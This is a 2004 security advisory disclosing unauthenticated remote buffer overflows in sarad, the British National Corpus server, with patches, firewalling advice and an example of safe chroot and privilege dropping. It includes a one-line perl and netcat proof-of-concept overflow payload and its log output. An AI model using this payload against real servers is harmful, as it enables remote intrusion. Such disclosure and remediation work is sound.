sarad.txt
Posted Aug 24, 2004
Authored by Matthias Bethke

The sarad program used at the British National Corpus is susceptible to multiple buffer overflows. No authentication is required to perform the attack and they are network based.

tags | advisory, overflow
SHA-256 | 3b5dbe5c14fa19bf31747e7ab1ad0dfe738810272c2dbce61216a3114a9177e7

I have found several buffer overflows in the sarad program used to serve
the British National Corpus (http://www.natcorp.ox.ac.uk/SARA/). At
least one (I didn't check the others too closely) allows execution of
arbitrary code over the network with the rights of the daemon, which is
supposed to be a dedicated low-rights account but which I have seen to be
root in places. No authentication is required to perform an attack, so the
risk is quite high.

The British National Corpus is used by many linguists for research on
the English language and is licensed commercially by the BNC Consortium.
The server software runs on various flavors of Unix and is freely
available in source form from http://www.natcorp.ox.ac.uk/SARA/, while
the client is a Win32 program (apparently the server can be compiled
for Windows too, but I haven't checked this). The server implements its
own access control system, therefore its port (7000 by default) is
usually not protected by additional measures such as iptables rules.

The bugs are classic examples of buffers on the stack that get copied
into without bounds checking and thus allow overwriting the return
address. The following perl snippet does a return-to-libc on Linux
2.6.7/glibc 2.3.2, logging some garbage by jumping into syslog():

perl -e 'print "SUCK" x 11; print chr foreach(0x90,0xdb,0x14,0x40,0);' \
| netcat victim 7000

The result:
Aug 19 20:50:05 drgonzo sarad[2449]: Connect from huxley.lan
Aug 19 20:50:05 drgonzo sarad[6519]: Client sent string SUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKSUCKÛ@
Aug 19 20:50:05 drgonzo sarad[6519]: syslog: unknown facility/priority: 80e5540
Aug 19 20:50:05 drgonzo sarad[6519]:P^F
Aug 19 20:50:05 drgonzo sarad[2449]: Forked process 6519
Aug 19 20:50:05 drgonzo sarad[2449]: Child pid=6519 was killed with signal 11

Possible solution: patch the source. I fixed the most glaring bugs,
checking array bounds, using strncpy() and snprintf() instead of their
unbounded counterparts, the usual stuff. Actually, even though the last
program version is from 2001, most of the code dates back to the mid-90s
and is a mess that dearly needs rewriting. So I'd suggest not trusting
the builtin access control either, but restricting access to the port as
much as possible using firewalls, iptables or similar measures.

There are two patches available from my homepage: one that should be
suitable for all systems and fixes the above-mentioned bugs, and one that
does the same and also lets sarad automatically chroot itself to the
corpus directory and drop rights to a specified account. The latter
will probably not compile on Windows. So even if there are dangerous
buffer overflows left in the code, which I think is almost certain, you
will not open your entire system to an attacker.
You can get the patches, including fairly simple installation
instructions, from
http://www.linguistik.uni-erlangen.de/~msbethke/binaries/sara-fix.tar.gz
(signature: .../sara-fix.tar.gz.sig)
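The chroot-and-drop-rights mitigation the second patch implements is easy to get wrong in ordering, so the following added example shows the sequence a daemon should use. It is not the author's patch and not SARA code; the directory, uid and gid are placeholder values, and the function name is an assumption.

```c
/* Added example (not the advisory author's patch): confine the daemon to
 * the corpus directory and drop to an unprivileged account, in the order
 * that actually works. Values are placeholders; a real daemon reads them
 * from its configuration. */
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 0 on success, -1 with errno set otherwise. Must run while still
 * root, after the listening socket is bound and before any client data
 * is parsed, so that a remaining overflow lands in a jail, not in root. */
int confine_and_drop(const char *corpus_dir, uid_t uid, gid_t gid)
{
    /* Refuse to "drop" to root or to a relative directory: both defeat
     * the purpose, and a relative chroot target is a classic mistake. */
    if (uid == 0 || gid == 0 || corpus_dir == NULL || corpus_dir[0] != '/') {
        errno = EINVAL;
        return -1;
    }
    /* chdir() before chroot(): chroot() alone leaves the working directory
     * outside the new root, which is enough to escape it. */
    if (chdir(corpus_dir) != 0) return -1;
    if (chroot(corpus_dir) != 0) return -1;
    if (chdir("/") != 0) return -1;

    /* Supplementary groups first, then gid, then uid. Once the uid is
     * unprivileged, setgroups() and setgid() would fail. */
    if (setgroups(0, NULL) != 0) return -1;
    if (setgid(gid) != 0) return -1;
    if (setuid(uid) != 0) return -1;

    /* Verify the drop is irreversible: regaining uid 0 must now fail. */
    if (setuid(0) == 0 || getuid() != uid || geteuid() != uid) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    const char *corpus_dir = "/var/lib/bnc";   /* hypothetical path */
    uid_t uid = 65534;                          /* hypothetical unprivileged account */
    gid_t gid = 65534;

    if (confine_and_drop(corpus_dir, uid, gid) != 0) {
        fprintf(stderr, "confine_and_drop: %s\n", strerror(errno));
        return 1;
    }
    puts("chrooted and unprivileged; safe to start parsing client input");
    return 0;
}
```

Any file the daemon still needs (corpus data, a log socket) has to live inside the chroot or be opened before this call; the checks at the top are cheap and catch the two configurations that would leave the process exactly as exposed as before.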

cheers!
Matthias